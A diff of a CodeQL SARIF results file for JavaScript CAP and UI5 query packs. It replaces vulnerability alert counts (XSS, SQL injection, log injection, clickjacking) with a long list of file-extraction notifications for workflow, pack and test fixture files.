"js/cap-log-injection Log entry depends on a [user-provided value](1).": { - "<": 5, - ">": 0 - }, - "js/xss Cross-site scripting vulnerability due to [user-provided value](1).": { - "<": 4, - ">": 0 - }, - "js/ui5-path-injection The path of a saved file depends on a [user-provided value](1).": { - "<": 3, - ">": 0 - }, - "js/ui5-formula-injection The content of a saved file depends on a [user-provided value](1).": { - "<": 3, - ">": 0 - }, - "js/ui5-clickjacking Possible clickjacking vulnerability due to missing frame options.": { - "<": 2, - ">": 0 - }, - "js/missing-rate-limiting This route handler performs [a database access](1), but is not rate-limited.": { - "<": 1, - ">": 0 - }, - "js/sql-injection This query string depends on a [user-provided value](1).": { - "<": 1, - ">": 0 - }, - "js/ui5-xss XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2).": { - "<": 1, - ">": 0 - }, - "js/ui5-clickjacking Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`.": { - "<": 1, - ">": 0 - }, - "js/ui5-clickjacking Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`.": { - "<": 1, - ">": 0 - }, - "js/cap-log-injection Log entry depends on a [user-provided value](1).\nLog entry depends on a [user-provided value](2).": { - "<": 1, - ">": 0 + "invocations" : [ { + "toolExecutionNotifications" : [ { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 48 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + 